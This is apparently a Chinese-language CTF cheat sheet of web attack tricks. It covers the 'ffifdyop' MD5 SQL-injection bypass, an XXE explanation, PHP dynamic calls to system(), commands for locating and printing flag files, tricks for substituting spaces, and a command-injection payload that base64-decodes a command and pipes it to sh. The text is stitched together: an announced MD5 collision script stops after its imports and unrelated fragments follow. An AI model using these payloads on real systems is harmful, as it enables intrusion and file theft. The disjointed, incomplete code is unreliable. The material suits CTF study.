0x04 MD5碰撞脚本
授人以鱼不如授人以渔,下面使多线程MD5哈希碰撞脚本,威力巨大。是根据网上代码改编而成,非原创。
# -*- coding: utf-8 -*-
import multiprocessing
import hashlib
import random
ffifdyop,这个点的原理是 ffifdyop 这个字符串被 md5 哈希了之后会变成 276f722736c95d99e921722cf9ed621c,
再转换为字符串:’or’6<乱码> 即 ‘or’66�]��!r,��b
这个字符串前几位刚好是 ‘ or ‘6,
XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。
php中可以把函数名通过字符串的方式传递给一个变量,然后通过此变量动态调用函数比如下面的代码会执行 system(‘ls’);
$a=’system’;
$a(‘ls’);
寻找flag文件常用命令小结:
system(‘ls’) : 列举当前目录下的所有文件
system(“find / -name flag”):查找所有文件名匹配flag的文件
system(“cat $(find / -name flag*)”):打印所有文件名匹配flag*的文件
空格替代:
${IFS}
$IFS$9
<
<>
{,}
sh
/?ip=127.0.0.1;echo$IFS$2Y2F0IGZsYWcucGhw|base64$IFS$2-d|sh